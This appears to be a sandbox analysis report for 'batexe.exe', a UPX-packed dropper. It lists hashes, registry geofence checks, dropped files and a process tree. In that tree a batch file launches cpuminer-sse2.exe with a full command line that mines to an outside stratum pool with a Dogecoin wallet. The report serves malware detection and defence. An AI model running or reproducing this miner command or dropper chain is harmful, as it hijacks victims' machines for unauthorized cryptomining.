73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17-02-2024 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5460	b2e.exe
2904	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2904	cpuminer-sse2.exe
2904	cpuminer-sse2.exe
2904	cpuminer-sse2.exe
2904	cpuminer-sse2.exe
2904	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3824-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 5460	3824	batexe.exe	84
PID 3824 wrote to memory of 5460	3824	batexe.exe	84
PID 3824 wrote to memory of 5460	3824	batexe.exe	84
PID 5460 wrote to memory of 4224	5460	b2e.exe	85
PID 5460 wrote to memory of 4224	5460	b2e.exe	85
PID 5460 wrote to memory of 4224	5460	b2e.exe	85
PID 4224 wrote to memory of 2904	4224	cmd.exe	88
PID 4224 wrote to memory of 2904	4224	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\615A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe

Filesize
10.7MB

MD5
6fb534f3cdc0f4ee2f67ae8cfae099d4

SHA1
cd6c80950c8c869926c3ee8ce0e6b30954bf41f7

SHA256
96dce10b0602bdc77a31f68c02f233c933a36d245d8897fbe88fc729b9fd4119

SHA512
e6f7e492de689b59f3c28a215f2273a807c15fc85ceb751f12352ffd2588ed9f49f5a8c7d7ef46d8951d1f7f47ea110ef0b8da9736061e7d0da808d30ce2ad02

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe

Filesize
5.8MB

MD5
42c7e263bc7f50f017b81d72f3b17ba0

SHA1
1c7e857ba300f14c8bb8a57ba172a207bac86602

SHA256
f36f6210bf7ddb040e2b312fa88f6ac47198b8e249ac3207b52d33667ea3032f

SHA512
a4b93da858f1ec9113bd17df4e66bfbd4fe162cd72b6f1bf80a7746fabc56135f440c421621f9539be171142374857a08cbf37ae789ec290c117732e9b253ff6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E8B.tmp\b2e.exe

Filesize
3.5MB

MD5
df222cbd1757fc8b91fdda76792d7f07

SHA1
d94c9c9d1a7505446a1382c1cb544587ed5033f1

SHA256
d832de80285a3454a12f56d652e9a4ce7f6b9364b418f11f5f5148fc9a2935c9

SHA512
009d931b67a676a732557c4191d52a1d406a66dbcdb0d0f3f2c7be223f190d3ef56eb7ff0aa1d1b5fa39fa496a4257ded7d49e67d347f42adde159cf99b96826

Download Submit
C:\Users\Admin\AppData\Local\Temp\615A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
9be3a9b7a9a749178fc248bde033cc71

SHA1
50e85f2f03b97920b86e55d2ead9470856d135be

SHA256
23eaa2b69b1d518270e40fd543b0bda79a638f54d82514565aa6df164c2722af

SHA512
e597a4915f61a7381489f6b53766dd75a93f692eb7d7b89d14b3604e0b5117239bf372f683b0772c66909b5b055f990e2a9296186b876e6ed94aeac1d4cc21d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
06360f7e10614fedab650c7b1132c7d3

SHA1
b84700ceef1d91e78b0dc7e86b28aac131ceec0d

SHA256
8d25e1d2eb6f11d718f3b8fb137d5afb45d86290051a4d7e6896758ceee9b9b7

SHA512
c9b4b9f78bbbd27a88a7476e0ffb8b496a65e700a47da468ba54b2143fb2a6622655b91e9cc2d5decd48073dab55813872818cc0a3133b5dcf8011b3dd5c1065

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
727KB

MD5
3f5124c64f1a19022e49ec1dc4b7eb5e

SHA1
f2bff99fc161a6281be5308723ba19a93fbc473b

SHA256
6c91a46d4bed51a5798cd4961c93de7b72080d445c032b2d5ac10f3c74593981

SHA512
6b315c556ebc08b9aca8124dfbe314017ac507d7a21ec801eb621fd889b5afa6b64687a35d6c214be5eb9cc3cbecadf17213da053235f173a844f92b28b2b25d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1013KB

MD5
9b86d6d17bb70a730783af367610fddc

SHA1
d62c6815028ce03f1ef7cd40e7df9576ab26f705

SHA256
21650b75afbba45b894948a1cd47d2755787f806a522bb8e5e8561a453ed6a84

SHA512
9f14e286919335606a0ec4dc3cf655dda74fb0a4ebcb008fce30d9e595fd2986e5627a90cdb0430f28947289cae2f28f6d35e72d8234c33180009b9b201f2171

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
31b2a0845579eba56c64c3ee7e7239e7

SHA1
01a7288e54fc22976f3c4c59ef0d7c36ee11e449

SHA256
6f62b8c1252134b7a363104042260aa24c3a7d7825bcb50dd85db5b732ab7b9e

SHA512
4eb39085073ec42973ff9d2e36015102154096abf851949470aa494badfa54dfb2e0eb4dd4d3e2273783be4063a78f46f72d792cc4bd5f77dc0416aee50ce32a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
4bde0d4d83d1319aeed731473df4526e

SHA1
fd0bf6880b35f80e2df2ced00562ede7aa3fc03b

SHA256
42159660c22cfbcd24f1234ebb42d466ab0180c6da3d2ce2d05d8b5e3703d2e9

SHA512
14788717ae91fdd678f2dd2dfe4eb2729bec94fd171f4e169faffc28d95f43f4aa7df4d54c2a97ffef4144bf9ad6432a1074324a6362312deeec66e4adb944aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
773KB

MD5
feb694370ba1e8e5602affd734d45d24

SHA1
8fa1101b9044cd03738947700cce3a42970f63e4

SHA256
5f8f3fdd4506258a0a7f7f5bc7af6232e6348a5ba056601e30cb411f754e0315

SHA512
96c3f2efcde19937f10a98faf00bce6ac43062aa45f71b5d80ef934806bb6eff04528cf5019fee7900457a8f9438fa50d9c063569c5b14f76f231b8b88dddc6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
747KB

MD5
2b43048db8de86fca580df89d97420e4

SHA1
2174fef7720c5e8b8328a82c0a1cfdf478945b41

SHA256
cb97f5f4ee79b3a78d4aba704d8a60c1422e5cb3da0f267dd694068ed73b391b

SHA512
ea1ba800c63e23f4ecd7ee393fc9034245fb52aab05fd7688c72a4d27941648ea705e856644c0e5dfe71b2571c38fcca30ffd783c43d6ac26cf567e4ed3f8ef5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2904-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2904-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2904-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-46-0x0000000054CD0000-0x0000000054D68000-memory.dmp

Filesize
608KB

Download
memory/2904-47-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/2904-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2904-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3824-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5460-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5460-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download